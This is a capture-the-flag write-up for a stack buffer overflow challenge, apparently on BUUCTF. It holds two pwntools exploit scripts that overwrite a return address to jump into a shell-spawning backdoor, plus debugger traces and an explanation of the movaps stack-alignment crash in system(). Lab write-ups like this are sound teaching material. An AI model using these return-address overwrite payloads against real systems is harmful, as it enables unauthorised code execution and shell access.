```python
from pwn import *
url = 'node4.buuoj.cn:27164'
domain, port = url.split(':')
io = remote(domain, int(port))
# 23 bytes of padding reach the saved return address, then return
# straight into the backdoor function past its prologue (0x40118a)
payload = b'a' * 23 + p64(0x40118a)
io.sendline(payload)
io.interactive()
```
Both addresses, 0x401187 and 0x40118a, work.
```python
from pwn import *
url = 'node4.buuoj.cn:27164'
domain, port = url.split(':')
io = remote(domain, int(port))
ret = 0x401016       # a bare `ret` gadget, used only to fix stack alignment
backdoor = 0x401186  # start of the backdoor function (its `push rbp`)
# padding, then the `ret` gadget, then the real target: the extra `ret`
# pops 8 more bytes so rsp is aligned the way system() expects
payload = b'a' * 23 + p64(ret) + p64(backdoor)
io.sendline(payload)
io.interactive()
```
As expected, it is the Ubuntu stack-alignment problem again: find the address of a `ret` and place it in between, and then returning directly to the start of the fun function also executes.
The variable s lives in main's stack frame, so control only reaches the backdoor address after main finishes and executes its ret.
The following is for research only.
The stack while it is still intact at leave
Stack frame with ebp completely overwritten
After ebp is completely overwritten, the eip on the stack after the gets function changes, to _dl_start
Completely overwriting ebp + the fun address does jump to fun, but a segmentation fault occurs while system is executing,
apparently a problem with the xmm floating-point registers
After overwriting ebp, following it with any `ret` address, or with the address 0x4011a0 (__libc_csu_init), both get a shell normally
gdb information at the time of the SIGSEGV:
```
   0x7f929d2a93f6 <do_system+1078>: movq   xmm0,QWORD PTR [rsp+0x8]
   0x7f929d2a93fc <do_system+1084>: mov    QWORD PTR [rsp+0x8],rax
   0x7f929d2a9401 <do_system+1089>: movhps xmm0,QWORD PTR [rsp+0x8]
=> 0x7f929d2a9406 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7f929d2a940b <do_system+1099>: call   0x7f929d299230 <__GI___sigaction>
   0x7f929d2a9410 <do_system+1104>: lea    rsi,[rip+0x39e1e9]        # 0x7f929d647600 <quit>
   0x7f929d2a9417 <do_system+1111>: xor    edx,edx
   0x7f929d2a9419 <do_system+1113>: mov    edi,0x3
[------------------------------------stack-------------------------------------]
0000| 0x7ffefdffa848 --> 0x7f929d2f11cc (<__GI___libc_malloc+140>: test   rax,rax)
0008| 0x7ffefdffa850 --> 0x7f929d40de17 (sub    eax,0x622f0063)
0016| 0x7ffefdffa858 --> 0x0
0024| 0x7ffefdffa860 --> 0x0
0032| 0x7ffefdffa868 --> 0x7f929d2a9470 (<cancel_handler>: push   rbx)
0040| 0x7ffefdffa870 --> 0x7ffefdffa864 --> 0x9d2a947000000000
0048| 0x7ffefdffa878 --> 0x7f929d2d828a (<__GI__IO_file_doallocate+170>: mov    eax,0x1)
0056| 0x7ffefdffa880 --> 0x2
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007f929d2a9406 in do_system (line=0x40201b "/bin/sh") at ../sysdeps/posix/system.c:125
125     ../sysdeps/posix/system.c: No such file or directory.
```
```
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
 RAX  0x7f929d40de17 ◂— sub eax, 0x622f0063 /* '-c' */
 RBX  0x0
 RCX  0x7f929d40de1f ◂— jae 0x7f929d40de89 /* 'sh' */
 RDX  0x0
 RDI  0x2
 RSI  0x7f929d6476a0 (intr) ◂— 0
 R8   0x7f929d647600 (quit) ◂— 0
 R9   0x0
 R10  0x8
 R11  0x246
 R12  0x40201b ◂— 0x68732f6e69622f /* '/bin/sh' */
 R13  0x7ffefdffaac0 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7ffefdffa8a8 ◂— 0x0
 RSP  0x7ffefdffa848 —▸ 0x7f929d2f11cc (malloc+140) ◂— test rax, rax
 RIP  0x7f929d2a9406 (do_system+1094) ◂— movaps xmmword ptr [rsp + 0x40], xmm0
─────────────────────────────────────[ DISASM ]─────────────────────────────────────
 ► 0x7f929d2a9406 <do_system+1094>    movaps xmmword ptr [rsp + 0x40], xmm0
   0x7f929d2a940b <do_system+1099>    call   sigaction <sigaction>
   0x7f929d2a9410 <do_system+1104>    lea    rsi, [rip + 0x39e1e9] <0x7f929d647600>
```
https://students.mimuw.edu.pl/~zbyszek/asm/en/instrukcje-sse.html
The address that movaps operates on must be 16-byte aligned, i.e. a multiple of 0x10, so the lowest hex digit is 0.
`movaps XMMWORD PTR [rsp+0x40],xmm0` therefore requires [rsp+0x40] to be aligned to 0x10; since the 0x40 offset is itself a multiple of 16, this comes down to rsp being 16-byte aligned at that point, which do_system assumes because the ABI requires rsp to be 16-byte aligned at every `call`.
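The following is an added example, not code from the writeup; it models why the first script works at 0x401187/0x40118a while returning to 0x401186 needs an extra `ret`. It tracks rsp modulo 16 from main's final `ret` to the entry of system(), using the rule the crash above depends on: x86-64 SysV requires rsp to be 16-byte aligned immediately before a `call`, so every function (system included) expects rsp % 16 == 8 at entry, and do_system's `movaps [rsp+0x40]` only works if that held. Assumptions beyond the page: main's frame is ABI-conformant (rsp is 16-aligned after `leave` pops rbp, leaving rsp % 16 == 8 before `ret`), the backdoor has the standard `push rbp; mov rbp, rsp` prologue (so 0x401187 is the `mov` and 0x40118a the first instruction after it), and `build_payload` does what `p64` does in pwntools without needing it installed.

```python
import struct

# Addresses taken from the writeup above.
BACKDOOR = 0x401186        # function start, assumed to be `push rbp` (1 byte)
MOV_RBP_RSP = 0x401187     # assumed `mov rbp, rsp` (3 bytes)
AFTER_PROLOGUE = 0x40118a  # first instruction after the prologue
RET_GADGET = 0x401016      # a bare `ret`
PADDING = 23               # bytes from the start of s to the saved return address


def build_payload(chain, padding=PADDING):
    """Padding followed by each chain address as a little-endian u64
    (the same bytes pwntools' p64() would produce)."""
    return b'a' * padding + b''.join(struct.pack('<Q', addr) for addr in chain)


def rsp_mod16_at_system_entry(chain, rsp_mod16_before_main_ret=8):
    """Return rsp % 16 at the moment `system` is entered.

    `chain` is the list of addresses written over main's return address,
    in stack order. Assumption: rsp % 16 == 8 while main's `ret` executes
    (rbp was 16-aligned; `leave` popped it). Each `ret` pops 8 bytes; a
    `ret` gadget just pops again; landing on BACKDOOR runs `push rbp`;
    any other target is assumed to push nothing before `call system`.
    """
    rsp = rsp_mod16_before_main_ret
    for addr in chain:
        rsp = (rsp + 8) % 16          # `ret` pops this address
        if addr == RET_GADGET:
            continue                  # the gadget immediately executes `ret` again
        if addr == BACKDOOR:
            rsp = (rsp - 8) % 16      # the backdoor's own `push rbp`
        break                         # reached the real target
    return (rsp - 8) % 16             # `call system` pushes the return address


def is_aligned_for_system(chain):
    """True when system() sees the ABI-mandated entry alignment (rsp % 16 == 8),
    which is what do_system's `movaps [rsp+0x40], xmm0` silently relies on."""
    return rsp_mod16_at_system_entry(chain) == 8


if __name__ == '__main__':
    cases = {
        'backdoor start 0x401186': [BACKDOOR],
        'ret gadget + 0x401186': [RET_GADGET, BACKDOOR],
        '0x401187 (skip push rbp)': [MOV_RBP_RSP],
        '0x40118a (skip prologue)': [AFTER_PROLOGUE],
    }
    for name, chain in cases.items():
        verdict = 'ok' if is_aligned_for_system(chain) else 'movaps would fault'
        print(f'{name:28} rsp%16 at system entry = '
              f'{rsp_mod16_at_system_entry(chain)}  -> {verdict}  '
              f'payload {len(build_payload(chain))} bytes')
```

Running the script shows the asymmetry the writeup observed: jumping to the function start costs one extra `push rbp`, which flips rsp to the wrong residue, so either an extra `ret` before it or skipping the push restores the alignment. The same check is useful in the other direction when hardening: a function compiled with a non-standard frame, or an interposed stub that forgets the alignment rule, produces exactly this class of SIGSEGV inside libc rather than in the caller's code.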
XMM registers
The 128-bit XMM registers are part of the SSE extension (where SSE is short for Streaming SIMD Extension, and SIMD, in turn, stands for single instruction multiple data). There are eight XMM registers available in non-64-bit modes and 16 XMM registers in long mode, which allow simultaneous operations on:
- 16 bytes
- eight words
- four double words
- two quad words
- four floats
- two doubles